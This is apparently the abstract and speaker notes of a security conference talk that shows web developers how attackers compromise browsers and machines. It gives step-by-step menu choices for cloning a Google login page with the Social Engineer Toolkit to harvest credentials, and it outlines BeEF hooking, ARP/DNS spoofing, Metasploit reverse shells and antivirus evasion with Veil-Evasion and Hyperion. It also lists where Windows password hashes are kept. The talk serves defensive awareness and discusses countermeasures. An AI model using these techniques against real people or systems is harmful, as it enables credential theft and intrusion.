0wn1ng The Web at www.wdcnz.com

0wn1ng The Web at www.wdcnz.com

Abstract:

JavaScript is an incredibly powerful tool for good. With great power comes great responsibility. Are we taking our responsibility seriously? JavaScript is also an incredibly powerful tool for evil. As a developer it's time to empower your tech sense and see how easy it is for those hiding in the shadows to own not only you, but your friends, family, clients, customers... Anyone that uses a browser. New advances in technology look shiny... until we stop believing the hype, open our minds and start poking at them. Let me show you what happens when we start poking.

The Play:

The presentation is basically the process I take to carry out a small client penetration testing assignment, but with a focus on why and how web developers should be doing the same within their teams. It goes through:

1. Why we even care about breaking our or a clients code and/or system(s)
2. Reconnaissance (information gathering), tools and tips. What can the public actually get their hands on?
3. Vulnerability scanning, tools and tips
4. Vulnerability searching, tools and tips
5. Exploitation, where to start, how to start, tools (and why) and tips
6. Demo 1: Exploiting an XSS vulnerable web app and what you can get from it using the Browser Exploitation Framework (BeEF). The whole reason being here is to be able to show your employer, boss, client and why they need to do something about it. After seeing how easy it is and what you can do, few will deny that it just needs to be fixed and provide the resources for you to do it.
7. Discuss countermeasures
8. Demo 2: Exploiting people with spear phishing, obtaining their credentials by cloning, spoofing a website they frequently login at with the Social Engineer Toolkit's (SET) Credential Harvester.
9. Discuss countermeasures
10. doppelganger domains (domains that look like the real thing but are fakes)
11. Demo 3: Add ARP and DNS spoofing to the mix. Now when a victim browsers to a website that they like to spend time at, they will be visiting our spoofed website. In this demo, we add the BeEF hook.js to the cloned website. This hook converts the victims browser into a zombie that continually polls the BeEF comms server requesting commands to execute on the victims machine. This is the window of time we use to install a root-kit and pwn the victims machine.
12. Discuss countermeasures
13. Discuss what BeEF can do
14. Demo 4: Again we clone and host a website we know the victim likes to visit with SET. We use a couple of Metasploit attack methods and exploit memory injection. Then select a collection of payloads to deliver via shellcode injection. Encrypt the payloads and configure the reverse shells. launch Metasploit and watch the reverse shells connect. Attempt to escalate privileges to system account. anti-virus (AV) stops us.
15. Demo 5: We use Veil-Evasion to get around AV by creating our payload. We encrypt the payload with Hyperion using a weak 128-bit AES key, which decrypts itself by brute force at the time of execution on the victims machine. We use Metasploit to deliver our psexec exploit that we created with Veil-Evasion and Hyperion. We watch the attackers reverse shell connect straight to the system account.
16. Discuss countermeasures

Speaker Notes:

##############################################################
Why do we Care
##############################################################

As web developers we are hired to create business value and reduce business costs.
Anything you can do to assist in that endeavour will go down well for you.

The following set of tools I use often in research and security engagements.

Reconnaissance: The act of information gathering.
The quieter you can do this, the less likely you will be to raise suspicions or raise your clients defenses.

Here we want to gather as much information that will be potentially useful for taking into the following stages.
Where we start to obtain more information about services & other software being used & their versions.
Moving from passive to more active techniques.

We need to learn as much as possible about the people involved within & related to the target org.
This way we’ll be able to create successful pretexts (become them).

Lee Baird’s discover-scripts
- Shell scripts to aggregate Kali Linux tools & automate various pentesting tasks.
Both passive & active options.
- Allow you to dig up a lot of dirt on your target long before you start trying to penetrate them.
- Domain and Person is very useful.

It’s really important to have done a good job at gathering information in the reconnaissance step.

You’ll know if you didn’t do well, as this step & even more so the exploitation stage will have you wondering what to attack first.
You’ll be hitting machines and people that are less vulnerable than others.
An attacker will focus on the lowest hanging fruit first, so should you.

Open Vulnerability Assessment System (OpenVAS) was forked from Nessus in 2005 before it went proprietary.
it’s accompanied with a daily updated feed of Network Vulnerability Tests, over 35,000 in total (as of April 2014).
Scans pretty much everything against known vulns.
Does make a lot of noise though.

Shows a very simple way of obtaining your victim's credentials using the Social Engineer Toolkit.

The Play: ####################################################

Nothing currently in the public web dir
Run setoolkit
Select: 1) Social-Engineering Attacks
Select: 2) Website Attack Vectors
Select: 3) Credential Harvester Attack
Select: 2) Site Cloner
Enter IP address that set listens on to capture the key log
We clone accounts.google.com
Host cloned and php file in apache web dir and start apache if it’s not already running
Now we see the cloned artifacts and the key log file
- Currently empty

Victim clicks link that was passed to them via social engineering.
This could be any site that you know the victim has creds for.
- Vic enters
- - kim@pentester.org - - myinsecurepassword

As soon as the victim posts,
1. SET uses the HTML referer header, in which it intercepts the request that comes from the victims IP address and harvests the posted credential fields.
2. The page redirects to the real accounts.google.com

setoolkit provides the ability to craft emails with spoofed from address. Just need to install and configure sendmail.

BeEF can be installed on public VPS’s,
so you can attack a NATed victims machine from the BeEF web UI from anywhere.

Amazon even has a policy for using their VPS’s for penetration testing.

There are a bunch of other public & free VPS’s you can use.

There’s also a number of ways to automate the running of modules on successful hooking.
BeEF provides the autorun script allowing a single module to be run
& there’s the beef_injection_framework which integrates with BeEF allowing the running of many modules against many browsers concurrently.

Discuss WebRTC extension.
- Encourage all to not just take tech at face value, but to think about how it can be exploited.
- This makes us all much better programmers.

Start Veil-Evasion.
List available payloads to encrypt.
Here we choose a service because we are going to use psexec to install it on the victims box.
We want it to open a reverse shell for us.

Set some options -> generate -> give it a name.
…

We’re going to encrypt the payload with hyperion,
hyperion encrypts with a weak 128-bit AES key, which decrypts itself by brute force at the time of execution.

Now we’re going to run metasploit with a psexec exploit.
These are the options we use.
Now we’ve got the credentials from a previous exploit…
There are many techniques and tools to help capture these, whether you have physical access or not.
We just need the username & password or hash which is transmitted across the network for all to see.
Also easily obtainable if you have physical access to the machine.

There are lots of ways of obtaining the targets password hashes and a few defense techniques.

Obtaining hashes:
- Windows SAM file. Located at C:\Windows\System32\config Only accessible while system not running
- These values are also stored in the registry at HKEY_LOCAL_MACHINE\SAM, Only accessible while system not running
- Over the wire during authentication.

- Long complex passwords which are changed regularly.
- Disabling LM Hashing (only accepting NTLMv2 auth requests).
- Using the SysKey Windows feature to help strengthen the encryption of the SAM file.
- Evaluate who has physical access.
Also consider social engineering. People are our strongest & weakest links